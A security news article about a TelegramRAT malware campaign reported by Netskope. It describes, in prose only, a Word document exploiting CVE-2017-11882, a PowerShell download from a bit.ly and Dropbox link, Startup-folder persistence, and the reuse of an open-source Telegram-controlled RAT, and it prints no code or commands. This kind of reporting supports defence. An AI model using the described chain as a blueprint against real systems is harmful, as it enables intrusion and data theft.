Open-Source Tools and Cloud Services at the Heart of Destructive TelegramRAT Malware Campaign

Researchers from Netskope recently stumbled upon a campaign distributing a strain of malware dubbed TelegramRAT. As the 'RAT' part of the name suggests, TelegramRAT is a Remote Access Trojan (RAT), and it's designed to perform quite a few malicious tasks.

The list includes executing shell commands, freezing the keyboard, keylogging, running, copying, moving and deleting files, opening a proxy server, recording audio through the microphone, taking screenshots, gathering information about the PC, changing the wallpaper, shutting down and rebooting the computer, etc. It's a long list, but it must be said that most of the RATs out there are also multi-talented. So, what's special about TelegramRAT?

The hackers are making use of CVE-2017-11882, an MS Word vulnerability that has existed for a whopping 17 years but was only discovered last month. It allows remote code execution through Microsoft's Equation Editor (the component that allows Office users to view and edit mathematical equations), and although November's Patch Tuesday fixed the security hole, campaigns observed over the last few weeks show that there's no shortage of outdated software that can still be exploited.

For TelegramRAT's campaign, the black hats embedded an OLE object inside a Word document called Adventurer LOG.doc. It's not clear whether the attack was targeted, and the distribution method is not mentioned in Netskope's blog, either. We do know what the malicious doc does, though.

The embedded OLE object executes a PowerShell script which downloads and runs the payload from a bit.ly link. When extended, the shortened URL points to a Dropbox location (which was taken down after Netskope got in touch with the cloud storage provider). This is not the first time the hackers use either bit.ly or Dropbox in their campaigns, and the fact that they're still employing them shows that these techniques make for an effective method for distributing malware.

The downloaded payload writes itself to %AppData%\MSOffice, and it also places a shortcut of itself in the Startup folder inside the Start Menu. This ensures that TelegramRAT runs every time the computer boots up.

After dissecting it, the researchers found out that TelegramRAT is pretty much a carbon copy of RAT-via-Telegram. RAT-via-Telegram is a project that was uploaded to GitHub several months ago. It's basically a Remote Access Tool that doesn't receive commands from a C&C server. Instead, the RAT's operators create a simple bot which uses the Telegram messaging application and communicate with the software through it. The advantages, the author of RAT-via-Telegram said, is a simple yet secure way of sending commands thanks to Telegram's end-to-end encryption.

As you might expect, the author (the original repository has been taken down, but there are copies aplenty) also pointed out that the RAT is to be used for educational purposes only, but, well, you can see what's happened.

So, to recap, the TelegramRAT gang basically took an open-source tool, made no modifications to it, and used free, publicly available services to make users' lives difficult. They spent minimum time and effort on creating a C&C infrastructure, and they exploited a know vulnerability that the victims should have patched. They don't look like the most sophisticated group of cybercriminals. That said, their RAT is still dangerous.

The payload itself weighs in at 16MB because the original tool was written in Python. By default, Python code doesn't run on Windows, which brought the necessity for a Python interpreter embedded within the payload. As a result, the file is unusually large for a malware sample, and some scanners might fail to take a proper look at it. In addition to this, traffic to the location hosting the actual payload is unlikely to be flagged as suspicious because Dropbox is a legitimate service used by millions around the world.

There was a time when launching a cyber attack involved quite a lot more than registering a few free accounts and copy/pasting some open-source code. Unfortunately, times have changed.